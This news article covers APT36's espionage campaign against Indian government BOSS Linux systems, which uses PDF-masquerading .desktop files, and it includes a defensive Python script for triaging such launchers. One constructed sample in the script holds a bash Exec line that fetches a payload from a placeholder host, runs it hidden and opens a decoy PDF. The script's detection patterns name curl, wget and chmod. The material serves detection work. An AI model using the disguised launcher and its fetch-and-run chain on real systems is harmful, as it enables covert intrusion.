
Fake Meeting Files Used In Cyber Espionage Campaign Against India
APT36 hackers from Pakistan have been found using weaponized shortcut files, phishing, malware, and 2FA theft to attack BOSS Linux systems in India.
In a rush? Here are the quick facts:
- APT36 is targeting India’s BOSS Linux systems with malicious .desktop files disguised as PDF shortcuts.
- The malware downloads hidden payloads while showing a decoy PDF in Firefox.
- Researchers linked the attack to Poseidon backdoor for spying and credential theft.
The Pakistan-based hacker group APT36, also known as Transparent Tribe, has started a new cyber-espionage operation against Indian government systems, according to research by CYFIRMA.
The group has built malware tailored to India’s BOSS Linux operating system, showing a growing ability to adapt its tooling to whatever environment the target runs.
The attack begins with spear-phishing emails carrying an archive named “Meeting_Notice_Ltr_ID1543ops.pdf_.zip.” Once opened, the archive reveals a shortcut file called “Meeting_Ltr_ID1543ops.pdf.desktop.” Although it looks like a harmless PDF, launching the file silently downloads malicious software.
“The ‘.desktop’ file shown is crafted to masquerade as an ordinary PDF shortcut but contains a chain of commands embedded in its Exec= line that are executed automatically and sequentially as soon as the file is launched. This enables the attacker to perform covert actions while keeping the victim unaware,” the researchers explained.
To stay undetected, the malware opens a genuine PDF in Firefox, so the user believes nothing unusual has happened.
Meanwhile the hidden program runs in the background stealing data, and it configures itself to start again every time the computer is turned on.
The malicious files discovered by CYFIRMA connect to two newly registered domains, “securestore[.]cv” and “modgovindia[.]space”, which serve as the attackers’ command-and-control servers. Through these servers the operators can send commands and retrieve stolen data while keeping their access to government networks.
CYFIRMA says APT36 is a state-sponsored group that has been active for more than ten years, primarily targeting Indian government, military, and diplomatic organizations.
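The three behaviours described above (a command chain hidden in the Exec= line, a decoy PDF opened in a browser, and a launcher that survives reboot) can all be checked for from the defender’s side. The Python script below is an added example, not part of the CYFIRMA research or of this article, and its heuristics are the editor’s own rather than any vendor’s detection logic. The three sample .desktop files are constructed for illustration; example.invalid is a placeholder host, and the autostart directories passed to scan_dirs are the usual XDG locations, not paths the report names.

```python
"""Triage .desktop launchers for the PDF-masquerade pattern described above.

Heuristics (constructed for this example, not CYFIRMA's detection logic):
  * the file name or Name= key ends in a document extension (.pdf, .docx, ...)
  * Exec= hands a script string to sh/bash -c, or chains several commands
  * Exec= references a URL or download/staging tools (curl, wget, chmod, nohup)
  * Exec= launches a document viewer next to other commands (the decoy)
A launcher merely named after a document is normal; a verdict needs the
masquerade plus at least one execution indicator, or three indicators.
"""
import configparser
import re
import shlex
from pathlib import Path

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt")
SHELL_WRAPPERS = {"sh", "bash", "dash", "zsh"}
CHAIN_RE = re.compile(r"(;|&&|\|\||\||&)")
STAGING_RE = re.compile(r"\b(curl|wget|base64|chmod|nohup|python3?)\b")
URL_RE = re.compile(r"https?://\S+")
DECOY_RE = re.compile(r"\b(firefox|xdg-open|evince|okular|libreoffice)\b[^;&|]*\.(pdf|docx?)\b")


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict, or {} if the text is not one."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep key case: Exec, Name, Terminal
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def analyze(text, filename=""):
    """Return the list of indicator strings found in one .desktop file."""
    entry = parse_desktop(text)
    if not entry:
        return []
    flags = []
    stem = filename[:-len(".desktop")] if filename.endswith(".desktop") else filename
    if stem.lower().endswith(DOC_EXTS) or entry.get("Name", "").lower().endswith(DOC_EXTS):
        flags.append("masquerade: launcher is named like a document")
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:  # unbalanced quotes; fall back to a crude split
        argv = exec_line.split()
    prog = Path(argv[0]).name if argv else ""
    if prog in SHELL_WRAPPERS and "-c" in argv:
        flags.append("shell wrapper: Exec passes a script string to %s -c" % prog)
        if entry.get("Terminal", "false").lower() != "true":
            flags.append("hidden: the shell runs without a visible terminal")
    if CHAIN_RE.search(exec_line):
        flags.append("chaining: several commands in one Exec line")
    if STAGING_RE.search(exec_line):
        flags.append("staging: download/decode/chmod tooling in Exec")
    if URL_RE.search(exec_line):
        flags.append("network: Exec references a URL")
    if CHAIN_RE.search(exec_line) and DECOY_RE.search(exec_line):
        flags.append("decoy: a document viewer is launched alongside other commands")
    return flags


def is_suspicious(flags):
    has_masquerade = any(f.startswith("masquerade") for f in flags)
    return (has_masquerade and len(flags) >= 2) or len(flags) >= 3


def triage(entries):
    """entries: iterable of (filename, text). Returns [(filename, flags)] for suspicious ones."""
    hits = []
    for name, text in entries:
        flags = analyze(text, name)
        if is_suspicious(flags):
            hits.append((name, flags))
    return hits


def scan_dirs(dirs):
    """Persistence sweep: triage every .desktop file in the given directories."""
    entries = []
    for d in dirs:
        for p in Path(d).expanduser().glob("*.desktop"):
            try:
                entries.append((p.name, p.read_text(errors="replace")))
            except OSError:
                continue
    return triage(entries)


# Constructed samples (not CYFIRMA's artifacts). example.invalid is a placeholder host.
BENIGN = """[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Exec=firefox %u
Terminal=false
"""
LEGIT_DOC_LINK = """[Desktop Entry]
Type=Application
Name=Quarterly_Report.pdf
Exec=xdg-open /home/user/Documents/Quarterly_Report.pdf
Terminal=false
"""
MASQUERADE = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://example.invalid/stage -o /tmp/.x && chmod +x /tmp/.x && nohup /tmp/.x & firefox /tmp/decoy.pdf"
"""
SAMPLES = [("firefox.desktop", BENIGN),
           ("Quarterly_Report.pdf.desktop", LEGIT_DOC_LINK),
           ("Meeting_Ltr.pdf.desktop", MASQUERADE)]

if __name__ == "__main__":
    # Usual XDG autostart locations plus the desktop; adjust for the host being checked.
    found = triage(SAMPLES) + scan_dirs(["~/.config/autostart", "/etc/xdg/autostart", "~/Desktop"])
    for name, flags in found:
        print(name)
        for f in flags:
            print("  -", f)
```

The threshold matters: a genuine PDF shortcut (Quarterly_Report.pdf.desktop above) trips only the masquerade heuristic and is left alone, while the constructed lookalike trips all seven. Run the sweep against ~/.config/autostart as well as the user’s desktop, since a launcher that re-executes on every login is exactly the persistence the report describes.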
Hacker News reports that the campaign shows APT36’s growing sophistication. Alongside the BOSS Linux malware, the group developed Windows malware in the same campaign, a dual-platform approach.
According to CloudSEK, the malicious code performs system reconnaissance and runs fake anti-debugging and anti-sandbox checks to avoid detection. The attacks led to the deployment of Transparent Tribe’s Poseidon backdoor, which lets the attackers steal credentials, conduct long-term surveillance, and move laterally inside government networks, as reported by Hunt.io researchers.
Hacker News notes that this activity comes shortly after Transparent Tribe was caught targeting Indian defense organizations with spoofed login portals designed to steal credentials and even codes for Kavach, the Indian government’s two-factor authentication (2FA) system.
Victims who entered their email and Kavach codes on the phishing sites unknowingly handed their login data directly to the attackers.
CYFIRMA noted: “APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.”
CYFIRMA warned that “the analysis indicates a coordinated cyber-espionage campaign attributed to APT36, leveraging weaponized .desktop files to target BOSS Linux environments within Indian Government entities.”